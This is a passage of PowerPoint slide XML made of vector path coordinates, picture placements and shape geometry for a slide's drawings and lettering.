                    <a:pt x="2243769" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279959" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320170" y="2083253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380487" y="2034992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2408634" y="2010862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2452866" y="1954558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476993" y="1894232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485035" y="1862058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2505140" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521225" y="1870101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589583" y="1870101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2613710" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641858" y="1862058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665984" y="1854015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690111" y="1841949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730322" y="1817819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746406" y="1797710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766511" y="1781624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782596" y="1765537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794659" y="1745428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2802701" y="1721298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2814765" y="1701189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="1677059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="1652928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="1628798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="1596624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2818786" y="1568472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2846933" y="1572494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2879102" y="1576516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2907250" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939418" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027883" y="1572494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3072115" y="1560429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112325" y="1548363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3152536" y="1532277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188726" y="1512168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253064" y="1463907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3309359" y="1407603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329465" y="1371408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3349570" y="1339234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365654" y="1303038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381739" y="1222604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3385760" y="1182387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381739" y="1142169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3373697" y="1101952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3349570" y="1029561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329465" y="993365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281211" y="929018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253064" y="900866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3220895" y="876735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188726" y="856627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3152536" y="832496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112325" y="816410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3072115" y="804344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027883" y="792279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939418" y="784236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2911271" y="788258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883123" y="788258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854976" y="792279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="800323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="695758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="663584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2818786" y="635432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810744" y="607280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2802701" y="583150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794659" y="554997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770533" y="498693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746406" y="450433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730322" y="426302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714237" y="406194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698153" y="382063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2678047" y="361955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661963" y="341846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641858" y="321737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2621752" y="305651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2601647" y="285542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2553394" y="253368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2481014" y="217173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2428740" y="197064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372444" y="180977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2288001" y="168912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259854" y="168912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2207580" y="172934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159326" y="176955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111073" y="193042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062820" y="205107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974356" y="245325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938166" y="273477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1897955" y="301629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1857744" y="237281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833618" y="209129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809491" y="176955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753196" y="128695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721027" y="104564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1684837" y="80434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648648" y="64347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616479" y="48260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576268" y="32173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1540078" y="20108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499867" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419445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E53E2490-2F87-CDD9-D042-B679B1557CC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480" y="2347164"/>
              <a:ext cx="3188726" cy="1998797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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21A00F84-D10B-E118-EC68-678A4AC7321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932" y="2272356"/>
              <a:ext cx="3434120" cy="2222500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4E091D1C-710D-B31E-4579-28463A09267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5232" y="2819638"/>
              <a:ext cx="650987" cy="957580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8228D553-DC32-5639-9D42-703FAE43334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6405" y="3394443"/>
              <a:ext cx="372321" cy="372110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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DB6B0E15-3078-C7F2-3767-4F8CE33ED9C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1248" y="3888236"/>
              <a:ext cx="984181" cy="94487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A30BF440-7884-8EBB-F3E9-DB5F6E3B5F4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72802" y="3103367"/>
              <a:ext cx="414022" cy="612559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2D230A88-32CA-A49B-592E-14C321924BE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0737" y="3134320"/>
              <a:ext cx="353019" cy="561923"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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D11AF25F-05FE-09D2-F60E-5D8999E9CDEB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4175391" y="3096538"/>
              <a:ext cx="431165" cy="618490"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="370151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="591119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61924" y="618015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143882" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61511" y="602826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26322" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51162" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410973" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="63726" y="602429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61511" y="602826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="539324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143882" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="551906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="10446" y="579287"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="581247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26322" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="579287"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579287"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="422007" y="538220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430803" y="538220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="538220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="32542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="77147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="51162" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51162" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430803" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="410973" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370750" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="21996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410973" y="14804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="366940" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370750" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804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B8AF8876-2E14-4372-3C66-921350BD12EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4108729" y="3689588"/>
              <a:ext cx="573405" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="573404" h="155575">
                  <a:moveTo>
                    <a:pt x="573028" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573028" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573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EAF87685-DD88-DF68-48F7-1E6D27201B27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4120230" y="3720109"/>
              <a:ext cx="551180" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="64760" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61732" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61732" y="38364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="38364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="21559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64760" y="21559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64760" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="103957" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82052" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82052" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103957" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103957" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="104567" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81443" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81443" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104567" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104567" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="147727" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125822" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125822" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="48808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150470" y="47833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153031" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157786" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175220" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168273" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170851" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172355" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173384" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175220" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165882" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163800" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156709" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152523" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="223216" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187087" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184507" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185189" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208967" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209178" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226854" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232157" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236994" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245731" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250385" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221936" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216430" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208952" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206920" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206595" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256603" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256603" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256320" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256238" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206534" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206842" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206859" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208362" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213712" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217242" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252159" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251888" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248231" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243525" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237789" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231411" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232372" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223216" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="255322" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="252904" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250385" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246971" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238314" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233844" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="252159" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="225980" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229333" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233620" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234678" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234758" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234880" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256238" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256077" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254690" y="43586"/>
